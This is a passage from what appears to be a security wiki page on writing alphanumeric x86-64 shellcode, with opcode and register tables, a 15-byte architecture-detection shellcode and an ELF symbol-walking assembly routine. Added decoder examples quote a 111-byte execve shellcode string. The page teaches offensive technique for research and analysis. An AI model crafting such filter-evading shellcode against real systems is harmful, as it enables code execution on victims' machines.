|outsl %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | p<br />
| 0x70<br />
| jo [byte]<br />
|-<br />
! scope="row" | q<br />
| 0x71<br />
| jno [byte]<br />
|-<br />
! scope="row" | r<br />
| 0x72<br />
| jb [byte]<br />
|-<br />
! scope="row" | s<br />
| 0x73<br />
| jae [byte]<br />
|-<br />
! scope="row" | t<br />
| 0x74<br />
| je [byte]<br />
|-<br />
! scope="row" | u<br />
| 0x75<br />
| jne [byte]<br />
|-<br />
! scope="row" | v<br />
| 0x76<br />
| jbe [byte]<br />
|-<br />
! scope="row" | w<br />
| 0x77<br />
| ja [byte]<br />
|-<br />
! scope="row" | x<br />
| 0x78<br />
| js [byte]<br />
|-<br />
! scope="row" | y<br />
| 0x79<br />
| jns [byte]<br />
|-<br />
! scope="row" | z<br />
| 0x7a<br />
| jp [byte]<br />
|-<br />
|}<br />
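The tables above fix the length of every instruction in the 64-bit alphanumeric subset, which makes a small decoder possible. The following is an added example, not code from the page: it walks a byte string in 64-bit mode using only the instruction classes from the tables (prefixes 6, d-g and A-O; push/pop P-Z; xor, cmp, movslq and imul with a ModR/M byte; xor al/eax and push with an immediate; jcc rel8 p-z; ins/outs l-o) and reports how many instructions the string decodes into, or -1 when it reaches a byte the tables mark as bad, a byte outside the tables, or an instruction cut off by the end of the input. It handles the general ModR/M, SIB and displacement cases rather than only the forms listed, and is a triage aid for checking whether a suspicious alphanumeric blob decodes cleanly as this subset; the '''modrm_len''', '''insn_len''' and '''count_alnum_insns''' functions are this example's own, and nothing is executed:<br />

```c
/* Added example, not from the original page: a length decoder for the 64-bit
 * alphanumeric x86 subset tabulated above. It applies the instruction classes
 * from the tables and counts instructions, or returns -1 at a byte the tables
 * mark bad, a byte outside the tables, or a truncated instruction. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bytes consumed by a ModR/M byte plus its SIB and displacement, 0 if it overruns. */
static size_t modrm_len(const unsigned char *p, size_t left)
{
    if (left < 1) return 0;
    unsigned mod = p[0] >> 6, rm = p[0] & 7;
    size_t n = 1;
    if (mod == 3) return 1;                          /* register-direct, no memory operand */
    if (rm == 4) {                                   /* SIB byte follows */
        if (left < 2) return 0;
        n += 1;
        if (mod == 0 && (p[1] & 7) == 5) n += 4;     /* SIB with no base: disp32 */
    } else if (mod == 0 && rm == 5) {
        n += 4;                                      /* RIP-relative disp32 */
    }
    if (mod == 1) n += 1;                            /* disp8 */
    else if (mod == 2) n += 4;                       /* disp32 */
    return n <= left ? n : 0;
}

/* Prefix bytes from the tables: %ss/%fs/%gs, 16-bit overrides and the REX bytes A-O. */
static int is_prefix(unsigned char b)
{
    return b == 0x36 || b == 0x64 || b == 0x65 || b == 0x66 || b == 0x67 ||
           (b >= 0x41 && b <= 0x4f);
}

/* Length of the instruction starting at p (prefixes included), 0 if undecodable. */
static size_t insn_len(const unsigned char *p, size_t left)
{
    size_t i = 0, m;
    while (i < left && is_prefix(p[i])) i++;
    if (i >= left) return 0;                         /* prefixes with no opcode */
    unsigned char op = p[i++];
    if (op == 0x37 || op == 0x61 || op == 0x62) return 0;          /* "Bad Instruction!" */
    if ((op >= 0x30 && op <= 0x33) || op == 0x38 || op == 0x39 || op == 0x63) {
        m = modrm_len(p + i, left - i);              /* xor, cmp, movslq: ModR/M only */
        return m ? i + m : 0;
    }
    if (op == 0x69 || op == 0x6b) {                  /* imul: ModR/M then imm32 / imm8 */
        size_t imm = (op == 0x69) ? 4 : 1;
        m = modrm_len(p + i, left - i);
        return (m && i + m + imm <= left) ? i + m + imm : 0;
    }
    if (op == 0x34 || op == 0x6a || (op >= 0x70 && op <= 0x7a))   /* xor al,imm8; push imm8; jcc rel8 */
        return i + 1 <= left ? i + 1 : 0;
    if (op == 0x35 || op == 0x68)                                  /* xor eax,imm32; push imm32 */
        return i + 4 <= left ? i + 4 : 0;
    if ((op >= 0x50 && op <= 0x5a) || (op >= 0x6c && op <= 0x6f)) /* push/pop reg; ins/outs */
        return i;
    return 0;                                        /* not in the alphanumeric tables */
}

/* Number of instructions a blob decodes into, or -1 if it does not decode cleanly. */
int count_alnum_insns(const char *s)
{
    const unsigned char *p = (const unsigned char *)s;
    size_t left = strlen(s);
    int n = 0;
    while (left > 0) {
        size_t l = insn_len(p, left);
        if (l == 0) return -1;
        p += l; left -= l; n++;
    }
    return n;
}

int main(void)
{
    /* The page's 15-byte detection snippet and its 111-byte execve payload. */
    printf("%d\n", count_alnum_insns("TX4HPZTAZAYVH92"));
    printf("%d\n", count_alnum_insns("jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZ"
                                     "X5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c"));
    printf("%d\n", count_alnum_insns("abc7"));        /* 'a' is marked bad: -1 */
    return 0;
}
```

Because the decoder treats A-O as REX prefixes, it models 64-bit mode only; the same bytes decode differently on a 32-bit processor (where A-O are inc/dec), which is exactly the difference the architecture detection snippet below exploits. A clean decode is a necessary, not a sufficient, sign of shellcode: ordinary text rarely decodes cleanly, but a -1 result on a long alphanumeric input does rule out this subset.<br />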
<br />
= Alphanumeric opcode compatibility =<br />
Intercompatible opcodes are worth noting: because many opcodes overlap, writing [[shellcode]] that runs on both 32 bit and 64 bit x86 platforms becomes possible. <br />
<br />
== Alphanumeric inter-compatible x86 opcodes ==<br />
This chart was derived by cross referencing [[#Available_Instructions|available 64 bit instructions]] with [[Ascii_shellcode#Available_Instructions|available 32 bit instructions]].<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Intercompatible x86* Alphanumeric Opcodes<br />
|-<br />
! scope="col" | Hex<br />
! scope="col" | ASCII<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0x64, 0x65<br />
| d,e<br />
|[fs &#x7c; gs] prefix<br />
|-<br />
! scope="row" | 0x66, 0x67<br />
| f,g<br />
| 16bit [operand &#x7c; ptr] override<br />
|-<br />
! scope="row" | 0x68, 0x6a<br />
| h,j<br />
| push<br />
|-<br />
! scope="row" | 0x69, 0x6b<br />
| i,k<br />
| imul<br />
|-<br />
! scope="row" | 0x6c-0x6f<br />
| l-o<br />
| ins[bwd], outs[bwd]<br />
|-<br />
! scope="row" | 0x70-0x7a<br />
| p-z<br />
| Conditional Jumps<br />
|-<br />
! scope="row" | 0x30-0x35<br />
| 0-5<br />
| xor<br />
|-<br />
! scope="row" | 0x36<br />
| 6<br />
| %ss segment register<br />
|-<br />
! scope="row" | 0x38-0x39<br />
| 8,9<br />
| cmp<br />
|-<br />
! scope="row" | 0x50-0x57<br />
| P-W<br />
| push *x, *i, *p<br />
|-<br />
! scope="row" | 0x58-0x5a<br />
| XYZ<br />
| pop [*ax, *cx, *dx]<br />
|-<br />
|}<br />
<br />
Because not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'', the architecture of an x86 processor can be determined using exclusively alphanumeric opcodes. The opcodes that are specifically not compatible are limited to the 64 bit prefixes '''0x40-0x4f''', which allow manipulation of 64 bit registers and of the 8 additional 64 bit general purpose registers '''%r8-%r15'''. By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that sets a value on a different register on each of the two processors. A conditional statement can then be made against one of the two registers to determine whether the value was set. Given the instruction limitations, '''pop''' is the most effective way to set the value of a register. Using a register other than %rsp or %esp as the stack pointer enables an effective conditional statement: whether the value of a register equals the most recent thing pushed to or popped from the stack.<br />
<br />
==15 byte architecture detection shellcode==<br />
{{info|This bytecode does not have a conditional jump. The reader may add this for customization based on the size and architecture of the payload that occurs after this snippet.}}<br />
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. The conditional jump may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.<br />
<br />
* Assembled:<br />
'''TX4HPZTAZAYVH92'''<br />
<br />
* Disassembly:<br />
[root@ares bha]# objdump -d xarch32.o<br />
<br />
xarch32.o: file format elf32-i386<br />
<br />
Disassembly of section .text:<br />
00000000 <_start>:<br />
0: 54 push %esp<br />
1: 58 pop %eax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %eax<br />
5: 5a pop %edx<br />
6: 54 push %esp<br />
7: 41 inc %ecx<br />
8: 5a pop %edx<br />
9: 41 inc %ecx<br />
a: 59 pop %ecx<br />
b: 56 push %esi<br />
c: 48 dec %eax<br />
d: 39 32 cmp %esi,(%edx)<br />
[root@ares bha]# # Returns not-equal on a 64 bit system:<br />
[root@ares bha]# objdump -d xarch64.o<br />
<br />
xarch64.o: file format elf64-x86-64<br />
<br />
<br />
Disassembly of section .text:<br />
<br />
0000000000000000 <_start>:<br />
0: 54 push %rsp<br />
1: 58 pop %rax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %rax<br />
5: 5a pop %rdx<br />
6: 54 push %rsp<br />
7: 41 5a pop %r10<br />
9: 41 59 pop %r9<br />
b: 56 push %rsi<br />
c: 48 39 32 cmp %rsi,(%rdx)<br />
<br />
On a 64-bit system this does not cause a segfault, because (%rdx) still points somewhere inside the stack. Note also that while this was assembled as a [[Linux]]-based ELF executable, the [[Operating System]] should not matter: the snippet stays within the legal instructions for any x86 CPU and should not cause an access violation.<br />
<br />
<br />
* '''Diagram of a 64-bit ELF Header:'''<br />
0x0 - 0xf = "ELF Format Information"<br />
Entry-point = 0x18 - 0x1f<br />
Start of section headers = 0x28 - 0x2f<br />
Size of each section = 0x3a - 0x3b<br />
Number of section headers = 0x3c - 0x3d<br />
<br />
<br />
* '''Diagram of a 64-bit section header:''' ''(length defined in ELF header)''<br />
[0x0-0x3] shstrtab offset for section name.<br />
shstrtab is defined between the end of<br />
.text and the beginning of the section<br />
headers<br />
<br />
[0x4-0x7] section type - 0 is null, 1 is progbits, 2 is symtab, 3 is strtab<br />
[0x8-0xf] section flags<br />
[0x10-0x17] section address<br />
[0x18-0x1f] section offset<br />
[0x20-0x27] section size<br />
[0x28-0x2b] Section Link<br />
[0x2c-0x2f] Section Info<br />
[0x30-0x37] Section Align<br />
[0x38-0x3f] Section EntSize<br />
<br />
* '''Diagram of a 64-bit symbol table entry:''' ''(0x18 bytes in length)''<br />
<br />
[0x0-0x3] Name offset from next string table<br />
[0x4-0x5] Bind<br />
[0x6-0x7] Ndx<br />
[0x8-0xf] Symbol pointer (Function pointer, data pointer, etc)<br />
[0x10-0x17] Null barrier<br />
<br />
It is relatively trivial to find the image base at runtime with a little assembly, but harder to actually parse the ELF image. Here is an unstable piece of assembly (no error or size checking) that dumps its own symbols:<br />
<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
<br />
.globl _start<br />
<br />
_start:<br />
jmp startup<br />
<br />
strlen:<br />
# Length of the NUL-terminated string at (%rsi), returned in %rdx.<br />
# No bound is checked: a missing terminator walks off the mapping.<br />
xor %rdx, %rdx<br />
<br />
next_byte:<br />
inc %rdx<br />
cmpb $0x00, (%rsi,%rdx,1)<br />
jne next_byte<br />
ret<br />
<br />
getpc:<br />
# The return address on the stack is an address inside this image;<br />
# the search below walks backwards from it to the "\x7fELF" magic.<br />
mov (%rsp), %rax<br />
ret<br />
<br />
startup:<br />
xor %r15, %r15<br />
push $0x0a0a0a # newline bytes; %r15 points at them for the second write<br />
mov %rsp, %r15<br />
call getpc<br />
dec %rax<br />
xor %rcx, %rcx<br />
push $0x2<br />
pop %rsi<br />
<br />
find_header:<br />
cmpl $0x464c457f, (%rax,%rcx,4) # Did we find our ELF base pointer?<br />
je find_sections<br />
dec %rax<br />
jmp find_header<br />
<br />
find_sections:<br />
# %rax now = base pointer of ELF image.<br />
xor %rbx, %rbx<br />
add $0x28, %bl<br />
xorl (%rax,%rbx,1), %ecx # %rcx = offset to section headers<br />
addq %rax, %rcx # %rcx = absolute address to section headers<br />
<br />
# each section header is 0x40 bytes in length.<br />
next_section:<br />
xor %rbx, %rbx<br />
xor %rbp, %rbp<br />
add $0x40, %rcx<br />
# %rcx now = address to first entry<br />
add $0x04, %bl<br />
xor (%rcx,%rbx,1), %ebp # %rbp now contains type<br />
cmp $0x02, %bpl<br />
jne next_section<br />
<br />
found_symbols:<br />
xor %r8, %r8<br />
mov %rcx, %r8 # %rcx = pointer to top of symbol section header<br />
add $0x40, %r8 # %r8 = pointer to top of string table section header<br />
<br />
xor %rbx, %rbx<br />
xor $0x18, %bl # pointer to actual section is $0x18 bytes from header base<br />
<br />
xor %r9, %r9<br />
xor %r10, %r10<br />
xor (%rcx,%rbx,1), %r9<br />
xor (%r8,%rbx,1), %r10<br />
addq %rax, %r9 # r9 should now point to the first symbol<br />
addq %rax, %r10 # r10 should now point to the first string<br />
addq $0x18, %r9<br />
<br />
next_symbol:<br />
addq $0x18,%r9<br />
xor %rcx, %rcx<br />
xor %rbp, %rbp<br />
xor %rdi, %rdi<br />
xor (%r9,%rcx,1), %ebp # %rbp now contains string offset.<br />
cmp %rbp, %rdi<br />
je next_symbol<br />
<br />
print_symbol_name:<br />
mov %rbp, %rsi<br />
addq %r10, %rsi # %rsi should now be a pointer to a string<br />
push $0x01<br />
pop %rax<br />
push %rax<br />
pop %rdi<br />
call strlen<br />
syscall<br />
<br />
push $0x01<br />
pop %rax<br />
push %rax<br />
pop %rdi<br />
push $0x02<br />
pop %rdx<br />
push %r15<br />
pop %rsi<br />
syscall<br />
jmp next_symbol<br />
</source>}}<br />
<br />
[hatter@bha soinject]$ ./test_parser <br />
startup<br />
<br />
getpc<br />
<br />
find_header<br />
<br />
find_sections<br />
<br />
next_section<br />
<br />
found_symbols<br />
<br />
next_symbol<br />
<br />
print_symbol_name<br />
<br />
strlen<br />
<br />
next_byte<br />
<br />
_start<br />
<br />
__bss_start<br />
<br />
_edata<br />
<br />
_end<br />
<br />
'''Segmentation fault'''<br />
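The same walk the assembly above performs (ELF header fields e_shoff at 0x28, e_shentsize at 0x3a and e_shnum at 0x3c; the section headers; the type-2 symbol table and the string table it links to) in a form an analyst can run offline, as an added Python example that is not part of the original article. It adds the size checks the assembly omits and builds its own minimal ELF64 image inline (a constructed sample containing only .symtab, .strtab and .shstrtab, with no loadable code), so it runs without touching a real binary. The symbol layout is the standard Elf64_Sym (st_name, st_info, st_other, st_shndx, st_value, st_size), which refines the diagram above: bytes 0x4 and 0x5 are st_info and st_other.<br />

```python
import struct

# ELF64 field offsets from the diagrams above: e_shoff, e_shentsize (e_shnum follows at 0x3c).
E_SHOFF, E_SHENTSIZE = 0x28, 0x3a
SHDR_SIZE, SYM_SIZE = 0x40, 0x18
SHT_SYMTAB, SHT_STRTAB = 2, 3
# sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, sh_addralign, sh_entsize
SHDR_FMT = "<IIQQQQIIQQ"
# st_name, st_info, st_other, st_shndx, st_value, st_size
SYM_FMT = "<IBBHQQ"


def _cstring(blob, off):
    """Bounded replacement for the strlen loop above: stop at NUL or raise."""
    end = blob.find(b"\x00", off)
    if off >= len(blob) or end < 0:
        raise ValueError("unterminated or out-of-range string")
    return blob[off:end].decode("ascii", "replace")


def elf64_symbol_names(blob):
    """ELF header -> section headers -> first SHT_SYMTAB -> linked SHT_STRTAB -> symbol names."""
    if blob[:4] != b"\x7fELF" or blob[4] != 2:          # EI_CLASS 2 = ELFCLASS64
        raise ValueError("not an ELF64 image")
    (shoff,) = struct.unpack_from("<Q", blob, E_SHOFF)
    shentsize, shnum = struct.unpack_from("<HH", blob, E_SHENTSIZE)
    if shentsize != SHDR_SIZE or shoff + shnum * SHDR_SIZE > len(blob):
        raise ValueError("section header table out of bounds")
    shdrs = [struct.unpack_from(SHDR_FMT, blob, shoff + i * SHDR_SIZE) for i in range(shnum)]
    symtab = next((s for s in shdrs if s[1] == SHT_SYMTAB), None)
    if symtab is None:
        return []
    link = symtab[6]                                       # sh_link names the string table
    if link >= len(shdrs) or shdrs[link][1] != SHT_STRTAB:
        raise ValueError("symtab sh_link does not name a string table")
    strtab_off, sym_off, sym_size = shdrs[link][4], symtab[4], symtab[5]
    if sym_off + sym_size > len(blob):
        raise ValueError("symbol table out of bounds")
    names = []
    for off in range(sym_off, sym_off + sym_size, SYM_SIZE):
        st_name = struct.unpack_from(SYM_FMT, blob, off)[0]
        if st_name == 0:                                   # the assembly above skips unnamed entries too
            continue
        names.append(_cstring(blob, strtab_off + st_name))
    return names


def build_sample_elf():
    """Constructed sample: a minimal ELF64 with .symtab/.strtab/.shstrtab only (no loadable code)."""
    strtab = b"\x00_start\x00strlen\x00getpc\x00"          # names at offsets 1, 8, 15
    shstrtab = b"\x00.symtab\x00.strtab\x00.shstrtab\x00"   # names at offsets 1, 9, 17
    syms = struct.pack(SYM_FMT, 0, 0, 0, 0, 0, 0)           # mandatory null symbol
    for name, value in ((1, 0x400080), (8, 0x400090), (15, 0x4000a0)):
        syms += struct.pack(SYM_FMT, name, 0x12, 0, 1, value, 0)   # 0x12 = STB_GLOBAL | STT_FUNC
    sym_off = 0x40                                          # right after the 64-byte ELF header
    str_off = sym_off + len(syms)
    shstr_off = str_off + len(strtab)
    shoff = shstr_off + len(shstrtab)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS64, little-endian, EV_CURRENT
    # e_type=EXEC, e_machine=x86-64, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 0x3e, 1, 0, 0, shoff, 0, 0x40, 0x38, 0, SHDR_SIZE, 4, 3)

    def shdr(name, typ, off, size, link=0, entsize=0):
        return struct.pack(SHDR_FMT, name, typ, 0, 0, off, size, link, 0, 1, entsize)

    shdrs = (shdr(0, 0, 0, 0)
             + shdr(1, SHT_SYMTAB, sym_off, len(syms), link=2, entsize=SYM_SIZE)
             + shdr(9, SHT_STRTAB, str_off, len(strtab))
             + shdr(17, SHT_STRTAB, shstr_off, len(shstrtab)))
    return ehdr + syms + strtab + shstrtab + shdrs


if __name__ == "__main__":
    for name in elf64_symbol_names(build_sample_elf()):
        print(name)
```

Point elf64_symbol_names at the bytes of any ELF64 file to list its symbols; the ValueError paths are the conditions under which the assembly above walks off the image and segfaults.<br />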
<br />
{{programming}}{{exploitation}}{{social}}<br />
<br /><br />
<br />
=Alphanumeric x86_64 register value and data manipulation=<br />
<br />
Given the limited instruction set of alphanumeric shellcode, it's important to note the different methods of manipulating registers within those confines. Identifying these leads to '''mov emulations''', which make up most of the actual code.<br />
<br />
==Push: alphanumeric x86_64 registers==<br />
<br />
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''One-byte, two-byte, and four-byte quantities'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pushw [word]<br />
| \x66\x68\x##\x##<br />
| fh??<br />
|-<br />
| pushq [byte]<br />
| \x6a\x##<br />
| j?<br />
|-<br />
| pushq [dword]<br />
| \x68\x##\x##\x##\x##<br />
| h????<br />
|}<br />
<br />
<br />
Pushing the 64 bit registers RAX-RDI is done with a single upper case letter P-W (\x50-\x57), depending on which register is pushed. Prefixing with "A" (for the general registers R8-R15) or "f" (for the 16 bit registers AX-DI) gives a total of 32 registers that can be pushed from alphanumeric shellcode.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %rax <br />
| \x50<br />
| P<br />
|-<br />
| push %rcx<br />
| \x51<br />
| Q<br />
|-<br />
| push %rdx<br />
| \x52<br />
| R<br />
|-<br />
| push %rbx<br />
| \x53<br />
| S<br />
|-<br />
| push %rsp <br />
| \x54<br />
| T<br />
|-<br />
| push %rbp<br />
| \x55<br />
| U<br />
|-<br />
| push %rsi<br />
| \x56<br />
| V<br />
|-<br />
| push %rdi<br />
| \x57<br />
| W<br />
|}<br />
<br />
<br />
For the general registers R8-R15 "A" is prefixed to the corresponding RAX-RDI register push. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8<br />
| \x41\x50<br />
| AP<br />
|-<br />
| push %r9<br />
| \x41\x51<br />
| AQ<br />
|-<br />
| push %r10<br />
| \x41\x52<br />
| AR<br />
|-<br />
| push %r11<br />
| \x41\x53<br />
| AS<br />
|-<br />
| push %r12<br />
| \x41\x54<br />
| AT<br />
|-<br />
| push %r13<br />
| \x41\x55<br />
| AU<br />
|-<br />
| push %r14<br />
| \x41\x56<br />
| AV<br />
|-<br />
| push %r15<br />
| \x41\x57<br />
| AW<br />
|}<br />
<br />
<br />
For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %ax<br />
| \x66\x50<br />
| fP<br />
|-<br />
| push %cx<br />
| \x66\x51<br />
| fQ<br />
|-<br />
| push %dx<br />
| \x66\x52<br />
| fR<br />
|-<br />
| push %bx<br />
| \x66\x53<br />
| fS<br />
|-<br />
| push %sp<br />
| \x66\x54<br />
| fT<br />
|-<br />
| push %bp<br />
| \x66\x55<br />
| fU<br />
|-<br />
| push %si<br />
| \x66\x56<br />
| fV<br />
|-<br />
| push %di<br />
| \x66\x57<br />
| fW<br />
|}<br />
<br />
<br />
For the 16 bit general registers R8W-R15W "f" is prefixed to the corresponding R8-R15 register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8w<br />
| \x66\x41\x50<br />
| fAP<br />
|-<br />
| push %r9w<br />
| \x66\x41\x51<br />
| fAQ<br />
|-<br />
| push %r10w<br />
| \x66\x41\x52<br />
| fAR<br />
|-<br />
| push %r11w<br />
| \x66\x41\x53<br />
| fAS<br />
|-<br />
| push %r12w<br />
| \x66\x41\x54<br />
| fAT<br />
|-<br />
| push %r13w<br />
| \x66\x41\x55<br />
| fAU<br />
|-<br />
| push %r14w<br />
| \x66\x41\x56<br />
| fAV<br />
|-<br />
| push %r15w<br />
| \x66\x41\x57<br />
| fAW<br />
|}<br />
<br />
==Pop: alphanumeric x86_64 registers==<br />
<br />
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode: only RAX, RCX, and RDX are available. As with push, prefixes give access to the 16 bit and general registers, so a total of 12 registers (6 full size and 6 16 bit) can be popped. <br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %rax <br />
| \x58<br />
| X<br />
|-<br />
| pop %rcx<br />
| \x59<br />
| Y<br />
|-<br />
| pop %rdx<br />
| \x5a<br />
| Z<br />
|}<br />
<br />
<br />
For the general registers, the RAX-RDX pops are prefixed with "A" for the corresponding R8-R10 pop. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %r8 <br />
| \x41\x58<br />
| AX<br />
|-<br />
| pop %r9<br />
| \x41\x59<br />
| AY<br />
|-<br />
| pop %r10<br />
| \x41\x5a<br />
| AZ<br />
|}<br />
<br />
<br />
16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):<br />
<br />
{| border="1" cellpadding="5" cellspacing="0" align="center"<br />
! Assembly<br />
! Hexadecimal<br />
! Alphanumeric ASCII <br />
|-<br />
| pop %ax<br />
| \x66\x58<br />
| fX<br />
|-<br />
| pop %cx<br />
| \x66\x59<br />
| fY<br />
|-<br />
| pop %dx<br />
| \x66\x5a<br />
| fZ<br />
|-<br />
| pop %r8w<br />
| \x66\x41\x58<br />
| fAX<br />
|-<br />
| pop %r9w<br />
| \x66\x41\x59<br />
| fAY<br />
|-<br />
| pop %r10w<br />
| \x66\x41\x5a<br />
| fAZ<br />
|}<br />
<br />
Using push and pop the values of 6 fullsize CPU registers can be set:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%r8<br />
*%r9<br />
*%r10<br />
<br />
Or get any values of 16 fullsize CPU registers to the top of the stack:<br />
<br />
*%r8-%r15<br />
*%rax-%rdi<br />
<br />
== Prefixes ==<br />
<br />
Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
These can only be written with alphanumeric instructions by going through one of the 6 fully controllable registers, emulating mov with push and pop. Using only the registers already under control, the following sections work out instructions to set their values.<br />
<br />
The special register prefix has been identified:<br />
<br />
0x41, 'A'<br />
<br />
The word operand override has been identified, <br />
<br />
0x66, 'f'.<br />
<br />
All of the alphanumeric overrides and prefixes are listed below. These overrides are very similar to those for 32 bit platforms.<br />
<br />
{| class="wikitable"<br />
! Hex Value<br />
! Alpha Value<br />
! Description<br />
|-<br />
| 0x36<br />
| 6<br />
| %ss segment override<br />
|-<br />
| 0x64<br />
| d<br />
| %fs segment override<br />
|-<br />
| 0x65<br />
| e<br />
| %gs segment override<br />
|-<br />
| 0x66<br />
| f<br />
| 16-bit operand size<br />
|-<br />
| 0x67<br />
| g<br />
| 16-bit address size<br />
|-<br />
| 0x41<br />
| A<br />
| 64-bit special register use (%r##)<br />
|-<br />
| 0x48<br />
| H<br />
| 64-bit register size override<br />
|-<br />
| 0x41-0x4f<br />
| A-O<br />
| Special 64-bit overrides<br />
|}<br />
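The push/pop tables and the prefix table above compose mechanically, so a short decoder is enough to read that subset of an alphanumeric string back into mnemonics. This added Python example is not part of the original article; it models only the push/pop opcodes listed above plus the 'f' (0x66), '6' (0x36) and 'A' (0x41, REX.B) prefixes, and raises on anything else. The ordering rule it applies, that a REX byte which is not immediately before the opcode is ignored by the CPU, is the standard x86-64 encoding rule rather than something the tables above state.<br />

```python
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REG16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]


def decode_push_pop(text):
    """Decode a run of the push/pop encodings tabulated above into AT&T mnemonics.

    Only the alphanumeric subset is modelled: opcodes 'P'-'W' (push), 'X'-'Z' (pop)
    and the prefixes 'f' (0x66, 16-bit operand), '6' (0x36, %ss, no effect on push/pop)
    and 'A' (0x41, REX.B, selects r8-r15). Anything else raises ValueError.
    """
    out = []
    i = 0
    while i < len(text):
        opsize16 = rex_b = False
        while i < len(text) and text[i] in "fA6":
            c = text[i]
            if c == "A":
                rex_b = True
            else:
                # A legacy prefix after REX means the REX byte is no longer directly
                # before the opcode, and the CPU then ignores it ("Af" decodes as "f").
                rex_b = False
                if c == "f":
                    opsize16 = True
            i += 1
        if i >= len(text):
            raise ValueError("prefix bytes with no opcode")
        op = ord(text[i])
        i += 1
        if 0x50 <= op <= 0x57:
            mnemonic, n = "push", op - 0x50
        elif 0x58 <= op <= 0x5a:          # only X, Y, Z (rax, rcx, rdx) are alphanumeric pops
            mnemonic, n = "pop", op - 0x58
        else:
            raise ValueError(f"{chr(op)!r} ({op:#x}) is not an alphanumeric push/pop opcode")
        if rex_b:
            reg = f"r{8 + n}" + ("w" if opsize16 else "")
        else:
            reg = (REG16 if opsize16 else REG64)[n]
        out.append(f"{mnemonic} %{reg}")
    return out


if __name__ == "__main__":
    # "TYX" is the push/pop mov emulation used later on this page.
    for insn in decode_push_pop("TYXfAPAXWZ"):
        print(insn)
```

Feeding it a string that contains any byte outside this subset (for example '[' = 0x5b, pop %rbx, which no character filter in this article would pass) raises, which is the intended signal that a full disassembler is needed for the rest.<br />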
<br />
== Operands ==<br />
<br />
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction:<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rax),%ebx</syntaxhighlight><br />
| \x33\x58\x##<br />
| 3X?<br />
|}<br />
<br />
The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rcx),%ebx</syntaxhighlight><br />
| \x33\x59\x##<br />
| 3Y?<br />
|}<br />
<br />
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
|<syntaxhighlight lang="asm">xor $0x[byte]({reg}),%ebx</syntaxhighlight><br />
| \x33\x??\x##<br />
